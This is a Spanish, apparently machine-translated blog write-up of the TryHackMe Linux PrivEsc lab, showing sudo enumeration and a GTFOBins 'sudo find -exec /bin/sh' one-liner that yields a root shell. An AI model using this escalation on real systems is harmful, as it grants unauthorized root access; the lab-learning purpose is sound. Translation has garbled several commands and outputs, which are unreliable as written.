[Tryhackme] Mejora del privilegio usando gtfobins! Linux Privesc Escritura Parte 3

[Tryhackme] Mejora del privilegio usando gtfobins! Linux Privesc WRITEPU PARTE 3

Esta vez, intentaremos aumentar los privilegios usando "gtfobins".
La máquina de destino usa la habitación debajo de TryhackMe.
"Tryhackme-Linux PrivSc: https://tryhackme.com/room/linuxprivesc "


Este artículo es la Parte 3.
Si desea verificar la redacción de Linux PrivSc con TryhackMe, también verifique la elevación de privilegios con permisos de archivos vulnerables en Linux

Tenga en cuenta que la explicación es spoilers.

Libros de referencia recomendados
\Amazon Prime Day ya está en marcha! /
Amazonas
Autor: Ipusiron
¥3,850 (A partir de 21:11 el 08/07/2025 | Amazon Research)
\Amazon Prime Day ya está en marcha! /
Amazonas
Autor: Justin Seitz, Autor: Tim Arnold, supervisado por: Mantani Nobutaka, Traducción: Arai Yu, Traducción: Kakara Hirosei, Traducción: Murakami Ryo
¥3,520 (A partir de las 12:26 el 07/07/2025 | Amazon Research)
\Amazon Prime Day ya está en marcha! /
Amazonas
Tabla de contenido

Preparación

Iniciar la máquina de destino

Primero, inicie la máquina de destino.
Únase a "Tryhackme-Linux PrivSc: https://tryhackme.com/room/linuxprivesc

Si la dirección IP se muestra así, el arranque está bien.

Conexión ssh

Conéctese a la máquina de destino que comenzó a usar SSH.
Como se explicó, está bien siempre que pueda conectarse usando "Usuario: contraseña321".

└─ $ ssh user@10.10.6.35 La autenticidad del host '10 .10.6.35 (10.10.6.35) 'no se puede establecer. DSA Key Fingerprint es SHA256: P2NSSFVYJVK1QE0TSNX5G2H8AAWYRN71JDZ3UEODBMA. Esta clave no se sabe por otros nombres, ¿está seguro de que desea continuar conectando (sí/no/[huella digital])? Sí Advertencia: agregó permanentemente '10 .10.6.35 '(DSA) a la lista de hosts conocidos. User@10.10.6.35's contraseña: Linux Debian 2.6.32-5-amd64 #1 SMP martes 13 de mayo 16:34:35 UTC 2014 x86_64 Los programas incluidos con el sistema GNU/Linux Debian son software gratuito; Los términos de distribución exactos para cada programa se describen en los archivos individuales en/usr/share/doc/*/copyright. Debian GNU/Linux no tiene absolutamente ninguna garantía, en la medida permitida por la ley aplicable. Último inicio de sesión: viernes 15 de mayo 06:41:23 2020 desde 192.168.1.125 Usuario@Debian: ~ $ sudo -l Entradas predeterminadas de coincidencia para el usuario en este host: env_reset, env_keep+= ld_preload, env_ senck+= ld_library_path

Es posible que deba agregar "-OHostKeyalgorithms =+SSH-RSA".

Elevación del privilegio usando gtfobins

Ahora, me gustaría intentar aumentar los privilegios usando gtfobins.

¿Cuántos programas se permite ejecutar el "usuario" a través de sudo? (¿Cuántos programas hay algún programa que el "usuario" pueda ejecutar a través de sudo?)

Primero, me gustaría obtener un programa que los usuarios puedan ejecutar en SODO.
El comando es "SODO -L".

Usuario@Debian: ~ $ sudo -l Entradas de default de coincidencia para el usuario en este host: Env_Reset, Env_Keep+= LD_PReload, Env_Keep+= LD_Library_Path User User puede ejecutar los siguientes comandos en este host: (root) Nopasswd:/usr/sbin/iftop (root) nopasswd:/usr/bin/find (root (root) no /usr/bin/nano (root) nopasswd:/usr/bin/vim (root) nopasswd:/usr/bin/man (root) nopasswd:/usr/bin/awk (root) nopasswd:/usr/bin/menos (root) nopasswd:/usr/bin/ftp (root) nopasswd: nMaP/bin/bin) (root) nopasswd:/usr/sbin/apache2 (root) nopasswd:/bin/más

Descubrí que los 11 programas anteriores se pueden ejecutar en SODO.

Un programa en la lista no tiene una secuencia de escape de Shell en GTFobins. ¿Cuál es?

A continuación, busque programas que no tengan una secuencia de escape de Shell.
(Supongo que es como buscar un programa con una secuencia de escape de Shell).

Cuando busqué cada uno, descubrí que no había "apache2".

La respuesta es "Apache2".

Intente elevar los privilegios con gtfobins

Ahora intentemos escalar los privilegios.
Debería ser posible si los elementos enumerados anteriormente son distintos de "Apache2". Esta vez lo intentaré con Find.

Primero, busque en Find y eche un vistazo a SODO.

Parece que es solo cuestión de ejecutar el comando, así que intentaré ejecutarlo para implementarlo.

Usuario@Debian: ~ $ sudo Find. -exec /bin /sh \; -Quit sh-4.1# whoami root

He confirmado que en realidad he sido elevado a la raíz.
Es realmente fácil. . . ¿Está bien ser tan simple? . .

resumen

Esta vez, intentamos aumentar los privilegios usando "gtfobins".
Fue un poco decepcionante porque era muy fácil aumentar los privilegios, pero parece que podría usarse.

Referencias y sitios

Medium ( Shamsher Khan ): https://infosecwriteups.com/linux-privesc-tryhackme-writeup-bf4e32460ee5

¡Comparte si quieres!

Quien escribió este artículo

Este es un blog que comencé a estudiar la seguridad de la información. Como nuevo empleado, sería feliz si pudieras mirar con un corazón amplio.
También está Teech Lab, que es una oportunidad para estudiar diversión de programación, por lo que si está interesado en el desarrollo de software, ¡asegúrese de echar un vistazo!

Tabla de contenido